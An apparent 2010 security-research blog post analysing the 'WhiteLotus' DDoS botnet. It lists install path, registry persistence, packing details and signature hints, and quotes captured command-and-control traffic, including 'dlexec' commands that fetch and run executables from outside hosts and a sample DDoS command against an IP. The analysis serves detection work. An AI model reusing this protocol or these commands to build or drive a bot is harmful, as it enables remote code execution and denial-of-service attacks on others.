WhiteLotus DDoS Botnet Analysis

Another new DDoS botnet family we found in our malcode zoo recently, which we have dubbed “WhiteLotus”, resembles BlackEnergy v2 but differs enough that we knew it wasn’t BEv2. Looking at Joe Stewart’s excellent BlackEnergy v2 analysis shows how this new version is modular, adds encryption and information theft to the arsenal of attacks and maintains its DDoS capabilities.

WhiteLotus doesn’t appear to be modular, but uses some of the same grammar as BEv2, which is what got me looking at it. WhiteLotus also doesn’t use encryption.

The bot usually installs itself as a 60KB Windows EXE as:

C:WINDOWSsystem32windef.exe

To ensure the bot runs at startup, it creates the following registry key:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunwindef.exe:
C:WINDOWSsystem32windef.exe

We haven’t seen rootkits or other hiding tools associated with this bot.

WhiteLotus can manage downloads and also launch DDoS attacks. Here’s an example of its communications, using HTTP to retrieve commands:

POST /[REMOVED].php HTTP/1.0
Host: crimesteambot.u2m.ru
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
id=HOSTNAME_2fee31f62405239f&btnet=symb&version=2&os=2600&nat=1

The server replies in plaintext, with a list of commands for the bot to act on:

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/5.2.6
Content-Type: text/plain
Date: Fri, 26 Mar 2010 21:37:07 GMT
Server: lighttpd/1.4.20
14|dlexec|hxxp://wassilijisgood.kilu.de/[REMOVED].exe|mem||hidden
13|dlexec|hxxp://derweisselotus.com/adm/[REMOVED].exe|mem||hidden
100

A DDoS command from the bot would look like this:

14|ddos|http|93.184.222.141:1935|0|100|25|0.60

Static analysis reveals that the bot is a UPX packed MS VB binary that drops another binary that has a Caesar shift of 13 positions applied to it. Once this analysis is done, you can see that the bot also supports SOCKS5 proxy features.

Some things to note with this bot’s HTTP transactions (e.g. if you’re writing a signature):

  • it uses version HTTP/1.0
  • there is no User-Agent header

Other than that it’s a standard HTTP DDoS bot. It appears to be in limited distribution with only a handful of samples and a handful of new servers.

Comments are closed.